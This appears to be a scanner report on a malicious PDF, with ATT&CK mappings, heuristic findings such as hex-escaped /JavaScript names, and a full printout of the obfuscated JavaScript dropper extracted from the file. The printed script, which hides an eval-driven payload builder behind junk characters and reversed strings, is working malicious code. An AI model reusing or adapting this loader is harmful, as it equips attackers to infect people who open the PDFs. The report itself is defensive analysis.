MALICIOUS
106
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains obfuscated JavaScript, indicated by critical heuristic firings for obfuscated name objects and embedded JS streams. The JavaScript attempts to construct a URL from concatenated strings, likely to download a secondary payload. The ML classifier also flagged this PDF as malicious with high confidence.
Machine Learning
- Nyx PDF Classifier malicious score 0.9950
Heuristics 3
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0011_000.jsff85b44f7d06834e69a161aee8e28b7340c56fef50ee1649100cb6f376ea5386 |
pdf-javascript-stream | PDF /JS object 11 at offset 0x1364 | 2324 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var fOJA = null;
try {
var pOT=String("len"+"gth");
var oJYZ=String("rAt");
var x=String("cha");
var pOR=this;
var rCX=50;
var v=1;
var rEL=0;
var zYN=/[@\>_9]/g;
function zAZ(nOL){
this.nML=nOL;
};
var pYN="va@r> >g>P>O@J9=9t9h>i@s_.>n9M9L9;@n_W9=>\'>g9e>t_P@a_g9e@N>\'>;_u_R_O@D>=_n@W9+>\'9t_h@W9o@r_d9\'@;_b@=>n@W>+>\'_u>m_W9o>r_d@s9\'@;9b9A@T9=9\'@p9a_g_e9N9u_m_\'9;@f9O>J9 >=> @7>1@ 9;_v>A9R_=>\'_\'>;>f9O@T@=>\'9j_o_i@n@\'@;>z@O@X_=9\'_\'9;>r>E@L>=_0_;>x@E>J_=@S>t9r9i@n_g9;@n9K9H>=>\'>s>u>b_s_t_r@\'@;9d_E@J@W@=>\'>e_v@a9l>\'@;9p9O9T_=9\'>l@e9n>g@t9h_\'9;9i@J_W@F@=9\'@\\>\\9x9\'>;9u_J@C_T_=@\'_t>o9S9t_r9i9n@g>\'_;>h_Y_V9=9\'9p@a9r>s9e>I_n@t@\'>;@b9O@D>=9\'>f_r9o9m_C>h>a9r>C>o>d>e_\'>;>p9C_D_=9\'>c9h@a_r>C_o@d_e_A9t9\'9;9v_=94_/>4_;>r@U>T9=_1@+@49;@l9I@T>=>2>0_09+_5_5>;_p@O@R>=@\'9d9o@c>\'@;_f>Q@R>=@393@29;9b>W@D>=9[@]@;@r>G_N_=9\'9\'9;9l>K@H_=>1@6@;>z@S9D@=92_;>n_Q>B@=@4@;9b9U>N@=>g_P>O9J>[9b@]>(>g>P_O>J_[@b9A@T_]@)9;@f_o>r>(>p>Q>N_=>r@E_L@;>p>Q9N><9 9b>U9N_;_ 9p_Q@N_+@+_)@{@v@a9r@ >n@M@T_=>g@P@O@J9[@u_R_O_D>]9(9g9P9O_J9[9b_A@T>]>,_p9Q@N_,@t9r@u@e_)_;9z>O9X>=@[@z9O_X9,_n_M9T_]9[>f>O9T@]9(_v_A@R_)@;9;9}@f>o@r9(@p@Q_N_=>0@;_p_Q9N@ _<9 9z>O9X>[@p_O@T9]@;_ @p9Q_N9+_=9z9S_D9)>{@z>W_F9=9z9O9X>[9n_K>H>]@(_p>Q>N@,@z@S>D@)9;@z>E>P9=>p9a9r>s_e_I_n>t9(_z9W>F@,9l>K@H9)9;>v@Q@J>=>z9E@P_^>f9O9J>;9p>C@V_=_v>Q_J9.>t>o_S>t9r9i9n@g_(@l9K@H9)>;_p_C@V@=_(_p>C@V9[>p>O>T@]_=9=@v_)@ >?9 9\'@0_\'_ _+_ _p9C>V@ _:@ >p@C_V9;>b9W_D>.@p9u>s@h>(_p9C@V>)9;_}>t@r@y9 9{_r@G@N>=@n>e>w@ _S>t_r@i_n_g9(@i_J9W@F9 @+@ 9b@W9D>[@f@O9T_]9(>i>J>W@F>)_)>;>a@p@p>[_d@E@J_W@]_(@\'>r9G9N9=>\"@\'@+>r@G_N9+@\'9\"_;9\'@)>;_g9P>O9J@.>h9A_T@=>(_r9G9N9[9n9K_H_]@(@r>G@N>[9p9O>T@]>-9f9Q_R9)>)9;9g>P_O9J_._h>Y>P9=>(9r@G_N@[@n>K9H>]@(9r>E@L9,@r@G_N_[>p9O_T>]9-@f_Q_R@)>)9;9d9U@D9(>)_;@}> 9c>a>t>c_h9(>d_I@J>)>{_i>f9(@g_P9O>J@.@h@Y_P_)@{_t9r9y@ 9{9a>p@p@[@d9E>J_W@]>(>g@P>O>J>._h@Y@P>)@;>}9 @c>a9t9c>h_(9d9I_J>)9{_}_}> 9e>l9s_e@ >{>}9}@";
app.lCH=function(dWJ){
lKB='';
var tMH = x + oJYZ;
for(pQN=dWJ[pOT];pQN >= 0;pQN--){
lKB+=dWJ[tMH](pQN);
}
return lKB;
}
var lCH=app.lCH;
dEJW=lCH("lav"+"e");
bAX = app.lCH('epytotorp');
pYN=pYN.replace(zYN, '');
zAZ.prototype={
hQR : function(tSP){
if(tSP > rCX){
this.nML[dEJW](pYN);
} else {
fOJA.hQR(tSP+v);
}
},
};
var fOJA=new zAZ(pOR);
fOJA.hQR(rEL);
} catch(rGN){
app.alert(rGN);
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.